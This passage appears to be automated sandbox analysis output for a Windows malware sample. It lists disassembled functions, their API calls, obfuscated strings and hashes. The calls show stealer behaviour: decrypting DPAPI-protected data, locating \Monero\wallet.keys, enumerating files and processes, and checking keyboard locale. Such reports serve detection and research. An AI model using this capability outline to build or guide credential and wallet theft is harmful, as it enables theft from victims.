                                    • Instruction Fuzzy Hash: AD915F72900104ABDB14FB71EC96EED777CABC8301F408669BD0A96191FE349B4DCB96
                                    Function 00957B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,009605AF), ref: 00957BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00957BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00957C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00957C62
                                    • LocalFree.KERNEL32(00000000), ref: 00957D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 2ef909328ed372b3ce6df17c97bd0ef64e5287508ba7fc0b38c5ad905914ebaa
                                    • Instruction ID: af02b4761572608845440011f722aacd642a0895e21f9021e48ad3ed641e7100
                                    • Opcode Fuzzy Hash: 2ef909328ed372b3ce6df17c97bd0ef64e5287508ba7fc0b38c5ad905914ebaa
                                    • Instruction Fuzzy Hash: 0D416071940118ABDB24DF95DC99BEEB778FF84701F2042D9E90962290DB342F89CFA5
                                    Function 00D0EFFD Relevance: 10.3, Strings: 7, Instructions: 1556COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: x?$)7Om$.O{$56q$B-_]$aK$$bC6
                                    • API String ID: 0-3626200227
                                    • Opcode ID: e5a5f4263d87aa4d47923948e17f665903c359c4b486440f1af3cbfcf7f4a1a2
                                    • Instruction ID: 01637024605e6c499599a36403313f64770846c22f4a60e0ed3711f1176c2ffd
                                    • Opcode Fuzzy Hash: e5a5f4263d87aa4d47923948e17f665903c359c4b486440f1af3cbfcf7f4a1a2
                                    • Instruction Fuzzy Hash: 58B206F35086049FE3046F2DEC8567AFBEAEF94720F1A493DEAC483744EA3558058697
                                    Function 0094E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00960D73), ref: 0094E4A2
                                    • StrCmpCA.SHLWAPI(?,009614F8), ref: 0094E4F2
                                    • StrCmpCA.SHLWAPI(?,009614FC), ref: 0094E508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0094EBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 3ed7bd24a9fb9aca9c592fc3d3feb1dc3de13b7de295e9f90259d9f0396e8eac
                                    • Instruction ID: 0c3fb15cc609d0e6cf4ae2baaa2ea016fb791da1fdbd62ae6be1014fcf9a6569
                                    • Opcode Fuzzy Hash: 3ed7bd24a9fb9aca9c592fc3d3feb1dc3de13b7de295e9f90259d9f0396e8eac
                                    • Instruction Fuzzy Hash: B31220719101189ADB18FB61DCA6FED7338BFD4301F4046A9B90A96091EF346F4DCB9A
                                    Function 00D0BA07 Relevance: 9.1, Strings: 6, Instructions: 1642COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *q36$5KYs$`H+$a}w${Nm~$)/}
                                    • API String ID: 0-3751471903
                                    • Opcode ID: d39dcef24c01c37899883d5f82dcb7f241c90607bde4e72bf3ae636a69f72b2f
                                    • Instruction ID: 404710ec8f9f25d53c42e05d530eba8152343d4e0e946712523704d923679270
                                    • Opcode Fuzzy Hash: d39dcef24c01c37899883d5f82dcb7f241c90607bde4e72bf3ae636a69f72b2f
                                    • Instruction Fuzzy Hash: 60B227F360C204AFE7046E2DEC85A7AFBE9EF94720F16493DE6C5C3744EA3558018696
                                    Function 00D083F6 Relevance: 9.1, Strings: 6, Instructions: 1571COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (w[$(/>$BWw{$XEI_$eH8T$K|;
                                    • API String ID: 0-1985316531
                                    • Opcode ID: 62aa3e04ccdfc2408b56b9cce6a74a5ad29bf32e1c0408dcabf73c712725460c
                                    • Instruction ID: d37bff0887f844bf09b8a0253ca215cdd49f02af7f9ab41c1d9a50b332f14d79
                                    • Opcode Fuzzy Hash: 62aa3e04ccdfc2408b56b9cce6a74a5ad29bf32e1c0408dcabf73c712725460c
                                    • Instruction Fuzzy Hash: E5B2D5F3A0C2009FE704AE2DEC8567ABBE5EF94720F1A493DEAC4C7344E63558158697
                                    Function 00D09E54 Relevance: 7.9, Strings: 5, Instructions: 1631COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: =J__$>RCG$AJ__$Tt_K$g|
                                    • API String ID: 0-4068420118
                                    • Opcode ID: e380497b39c13959b3da1faa7fe1b714c958d346e69ce8c4ebb95326f48592fb
                                    • Instruction ID: 00384d1b6fc9e79c0f8e68be35fbed0a63c001d0bccca03acd6fc34cb6e94005
                                    • Opcode Fuzzy Hash: e380497b39c13959b3da1faa7fe1b714c958d346e69ce8c4ebb95326f48592fb
                                    • Instruction Fuzzy Hash: 53B25AF36082049FE704AE2DEC8567ABBE6EFD4720F1A463DE6C4C7744E93598058687
                                    Function 0094C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0094C871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0094C87C
                                    • lstrcat.KERNEL32(?,00960B46), ref: 0094C943
                                    • lstrcat.KERNEL32(?,00960B47), ref: 0094C957
                                    • lstrcat.KERNEL32(?,00960B4E), ref: 0094C978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 25f5c87a2433559fc2260da43a27ab1fd4a4ba8febdc59b59d3e072be6934848
                                    • Instruction ID: 41fdbc3cb3e480d7f8cb2f23fd98cfbf8dc767d2d6f134337d7418785b3ff837
                                    • Opcode Fuzzy Hash: 25f5c87a2433559fc2260da43a27ab1fd4a4ba8febdc59b59d3e072be6934848
                                    • Instruction Fuzzy Hash: 114182B590420AEFDB10DFA0DC89FEEB7B8BB44304F1045A9E509A7280DB745A84CF91
                                    Function 00947240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0094724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00947254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00947281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009472A4
                                    • LocalFree.KERNEL32(?), ref: 009472AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 0c437e5c47191889fa37877743aa1202946838a719817a53ec5c8abdb9bb5c27
                                    • Instruction ID: 4114664f9fd2463af334911a28daf4c23dd163ea171af9501b37738f599c5941
                                    • Opcode Fuzzy Hash: 0c437e5c47191889fa37877743aa1202946838a719817a53ec5c8abdb9bb5c27
                                    • Instruction Fuzzy Hash: A9010CB5A40208BBEB10DFD4CD4AF9EB7B8AB44B00F104555FB05AB2D0DAB4AA00CB65
                                    Function 00959600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0095961E
                                    • Process32First.KERNEL32(00960ACA,00000128), ref: 00959632
                                    • Process32Next.KERNEL32(00960ACA,00000128), ref: 00959647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 0095965C
                                    • CloseHandle.KERNEL32(00960ACA), ref: 0095967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 919684d6fa0ee1b890d9904c475058f83d6151f611524912308a4e4fd9e9e65d
                                    • Instruction ID: 909d5be1c90624232483a44d9aa82bac32091d10c18a3cd464da330cb1036e60
                                    • Opcode Fuzzy Hash: 919684d6fa0ee1b890d9904c475058f83d6151f611524912308a4e4fd9e9e65d
                                    • Instruction Fuzzy Hash: A4011E75A01208EBEB14DFA5DD58BEDB7F8EB48301F104189A906A7250DB349F48DF51
                                    Function 00958680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009605B7), ref: 009586CA
                                    • Process32First.KERNEL32(?,00000128), ref: 009586DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 009586F3
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • CloseHandle.KERNEL32(?), ref: 00958761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 26b544374750179e6aeac74d892ba4aa0a74eaa124b89cd32f32aa5e63cc81dd
                                    • Instruction ID: e9138cfeaea92e117e4248d1ef7d7479bb9a4848b08f27b2548fede924a44a95
                                    • Opcode Fuzzy Hash: 26b544374750179e6aeac74d892ba4aa0a74eaa124b89cd32f32aa5e63cc81dd
                                    • Instruction Fuzzy Hash: 2D316D71901218ABDB24DF52CC51FEEB778FB88701F104299F90AA21A0DF306E49CFA5
                                    Function 00958EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00945184,40000001,00000000,00000000,?,00945184), ref: 00958EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
